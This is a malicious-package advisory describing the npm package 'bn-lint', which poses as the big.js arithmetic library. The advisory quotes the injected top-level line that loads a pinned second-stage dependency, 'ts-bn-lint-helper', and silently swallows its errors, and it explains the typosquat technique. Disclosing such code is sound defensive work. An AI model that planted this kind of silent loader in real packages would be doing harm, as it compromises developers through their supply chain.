MAL-2026-6376

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (c14057d91b2283926b2b0c1093a66db17c40efbd0ceb21c29b0bdbfa79736da5) Package is published as 'bn-lint' but ships a verbatim copy of MikeMcl/big.js (README, source, version banner v7.0.1, and repo URL all identify as big.js). Both entrypoints, big.js and big.mjs, have been modified at lines 605-606 to inject `const helper = require("ts-bn-lint-helper"); helper.from_str().then(e => e).catch(e => { });` at module top level. Any `require('bn-lint')` or `import` of the package immediately loads and invokes the separately-published, pinned `ts-bn-lint-helper@3.1.19` (declared in package.json line 58). The `.then(e => e).catch(e => { })` wrapping silently swallows both resolution and rejection values, suppressing logs, thrown errors, and rejected promises so the secondary payload's execution is invisible to a developer using what they believe to be a big.js arithmetic library. The combination of impersonated identity, top-level loader injection into an otherwise unrelated arithmetic library, a pinned untrusted second-stage dependency, and deliberate error suppression is consistent with a typosquat-with-payload supply-chain attack rather than a legitimate fork.